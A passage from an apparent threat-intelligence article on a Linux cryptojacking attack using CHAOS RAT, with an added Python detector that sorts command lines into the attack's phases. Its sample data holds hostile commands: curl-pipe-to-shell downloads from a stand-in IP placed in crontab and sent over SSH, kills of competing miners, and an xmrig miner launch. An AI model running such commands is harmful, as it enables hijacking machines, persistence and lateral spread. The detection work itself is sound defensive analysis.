Linux Cryptocurrency Mining Attacks Enhanced via CHAOS RAT
We intercepted a cryptocurrency mining attack that incorporated an advanced remote access trojan (RAT) named the CHAOS Remote Administrative Tool.
We’ve previously written about cryptojacking scenarios in which Linux machines and specific cloud computing instances were targeted by threat actors active in this space, such as TeamTNT. We found that the routines and chain of events were fairly similar even across different threat actors: in the initial phase, attackers try to kill off competing malware, security products, and other cloud middleware. This is followed by routines for persistence and payload execution, the payload in most cases being a Monero (XMR) cryptocurrency miner. In more sophisticated threats, we also observed capabilities that allowed the malware to spread to more devices.
In November 2022, we intercepted a threat that had a slightly different routine and incorporated an advanced remote access trojan (RAT) named the CHAOS Remote Administrative Tool (Trojan.Linux.CHAOSRAT), which is based on an open source project.
Note that the original flow, in which competing malware such as Kinsing is terminated and processes that compete for the CPU and would reduce cryptocurrency mining performance are killed, remained unchanged.
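The chain described above (kill competitors and agents, persist, run a miner, spread) is what a detection engineer would look for in process-execution telemetry. The following is an added example, not code from the article or from the threat actors it describes: a small heuristic that tags captured command lines with the phase of the chain they belong to and escalates when the kill-competitor phase and a miner payload appear together. The process names (xmrig, minerd), service name, pool URL, IP addresses and all sample command lines are constructed for illustration and are assumptions, not indicators from the campaign.

```python
import re

# Heuristic patterns for each phase of the cryptojacking chain. The miner and
# competitor names (kinsing, xmrig, minerd, ...) and the argument patterns are
# assumptions for illustration; tune them to the miners and agents you see.
PHASE_PATTERNS = {
    # kill/pkill/killall aimed at a known competing miner or loader
    "kill_competitor": re.compile(
        r"\b(?:pkill|killall|kill)\b.*\b(?:kinsing|xmrig|minerd|cryptonight)\b", re.I),
    # stopping or disabling services (security agents, cloud middleware)
    "stop_service": re.compile(
        r"\b(?:systemctl\s+(?:stop|disable)|service\s+\S+\s+stop)\b", re.I),
    # cron or init based persistence
    "persistence": re.compile(
        r"(?:crontab\s+-|/etc/cron|/var/spool/cron|/etc/rc\.local|systemctl\s+enable)", re.I),
    # execution of a miner binary or miner-style arguments (pool URL, donate level)
    "miner": re.compile(
        r"(?:(?:^|/)xmrig\b|stratum\+tcp://|--donate-level)", re.I),
    # lateral movement over SSH with host-key checks disabled
    "spread": re.compile(
        r"(?:ssh\s+.*StrictHostKeyChecking=no|\.ssh/known_hosts)", re.I),
}

# Constructed sample command lines, in the form an execve audit log or an
# EDR agent would record them. Not captured from any real incident.
SAMPLE_CMDLINES = [
    "pkill -f kinsing",
    "kill -9 $(pgrep -f xmrig)",
    "systemctl stop cloud-agent.service",
    "(crontab -l 2>/dev/null; echo '* * * * * curl -fsSL http://203.0.113.5/x.sh | sh') | crontab -",
    "/tmp/.x/xmrig -o stratum+tcp://pool.example.net:3333 --donate-level 0",
    "ssh -oStrictHostKeyChecking=no root@10.0.0.7 'curl -fsSL http://203.0.113.5/x.sh | sh'",
    "ls -la /var/log",
]


def classify(cmdline):
    """Return the set of chain phases that a single command line matches."""
    return {phase for phase, pat in PHASE_PATTERNS.items() if pat.search(cmdline)}


def analyze(cmdlines):
    """Map each detected phase to the command lines that triggered it."""
    hits = {}
    for line in cmdlines:
        for phase in classify(line):
            hits.setdefault(phase, []).append(line)
    return hits


def verdict(hits):
    """Escalate only when the kill-competitor phase and a miner payload coincide.

    A lone 'kill' of a miner name could be an admin cleaning up; a miner
    together with competitor termination matches the chain the article describes.
    """
    if "kill_competitor" in hits and "miner" in hits:
        return "cryptojacking chain"
    if "miner" in hits:
        return "miner only"
    if hits:
        return "suspicious"
    return "clean"


if __name__ == "__main__":
    found = analyze(SAMPLE_CMDLINES)
    for phase, lines in found.items():
        print(f"[{phase}]")
        for line in lines:
            print("   ", line)
    print("verdict:", verdict(found))
```

The phases are deliberately evaluated per host rather than per command line: each step of the chain looks mundane on its own, and the signal is in their co-occurrence within one session or short time window.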
The malware achieves its